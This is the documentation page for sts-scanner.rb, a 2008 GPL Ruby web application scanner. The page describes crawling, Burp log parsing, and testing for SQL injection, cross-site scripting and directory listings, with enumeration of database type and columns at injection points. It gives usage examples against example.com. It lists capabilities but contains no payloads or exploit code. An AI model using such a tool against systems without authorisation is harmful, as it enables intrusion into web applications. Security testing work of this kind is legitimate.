sts-scanner.rb

Path: sts-scanner.rb
Last Update: Tue Jan 08 19:48:33 +1100 2008

Synopsis

Command line interface to the sts scanner. This is an extension to the extended scanner and simple scanner from Network Security Tools By Justin Clarke, et al (Ch 8, 9) adding more capability and functionality.

The scanner is capable of intelligently crawling a web application and or parsing a Burp log file (Refer to portswigger.net/proxy/) to build the attack surface.

It has the following crawling capabilities:

  1. Understand Authentication Schemes (see below)
  2. Understand HTTP Schemes (see below)
  3. Uses Hpricot to intelligently parse HTML pages identifying URLs from: 
       a. Frames, iFrames src value
   b. Anchor tags href value
   c. IMG tags with src value
   d. Form tags and fields to build GET/POST requests with query strings

The following vulnerabilites are tested:

  1. SQL Injection
  2. Cross Site Scripting
  3. Directory Listings

The scanner has intelligent capabilities to perform enumeration and exploits on discovered sql injection points. The following information is enumerated:

  1. Valid SQL injection (i.e., not a false positive)
  2. Backend database type (currently supports MS SQL, Oracle and MySQL)
  3. Number of columns at the injection points table
  4. Data type of each column identified

The scanner and crawler can handle the following authentication schemes:

  1. Proxy authentication
  2. Basic authentication
  3. Digest authentication
  4. Cookies authentication
  5. SSL Certificate authentication
  6. CA verification

The scanner and crawler understand the following HTTP schemes:

  1. HTTP 0.9, 1.0, 1.1
  2. SSL connections
  3. Memory of previous visited pages with updated referer tag
  4. Updating of cookie jar based on server set-cookie responses
  5. Ability to turn 302 redirects on and off

The scanner‘s attack surface covers the following:

  1. GET and POST requests
  2. URL parameters
  3. Post parameters
  4. HTTP headers...referer, user-agent and cookie.
  5. Directory listings
  6. Files

Copyright

Copyright (c) 2007 - 2008 by Security Technology Science Pty Ltd. All rights reserved.

License

This file is part of STS Scanner.

STS Scanner is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

STS Scanner is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with STS Scanner. If not, see <www.gnu.org/licenses/>.

Examples

Without any log file provided, scanner automatically crawls target

 ruby sts-scanner.rb http://www.example.com

Providing a burp log file

 ruby sts-scanner.rb --log example.com.burp http://www.example.com

Tunneling through a proxy

 ruby sts-scanner.rb --proxy_ip 127.0.0.1 --proxy_port 8080 http://www.example.com

SSL with a cookie on obscure port

 ruby sts-scanner.rb --cookie "id=1234; secure" https://www.example.com:6969

Basic Authentication

  ruby sts-scanner.rb --basic_user uname --basic_password pword http://www.example.com

References

exploit/dirTest, exploit/xssTest, exploit/sqlTest, parser/burpparser algorthms were directly ported from perl source code. Network Security Tools (Ch 8 - 9) by Justin Clarke et al. See www.oreilly.com/catalog/networkst/ for the sample chapter and perl source code.

Mechanize directory from mechanize.rubyforge.org/mechanize/

Required files

optparse   ostruct   uri   logger   lib/parser   lib/crawler   lib/exploit   lib/mechanize   rubygems   hpricot  

[Validate]